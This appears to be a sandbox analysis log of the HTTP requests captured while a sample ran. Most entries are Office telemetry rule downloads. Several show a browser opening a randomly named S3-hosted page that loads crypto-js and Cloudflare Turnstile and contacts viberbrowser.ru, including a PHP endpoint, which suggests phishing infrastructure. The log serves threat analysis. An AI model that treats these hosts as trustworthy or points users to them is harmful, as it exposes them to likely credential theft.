Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html HTTP/1.1Host: ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET // HTTP/1.1Host: viberbrowser.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /, HTTP/1.1Host: ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET ///8404.php HTTP/1.1Host: viberbrowser.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
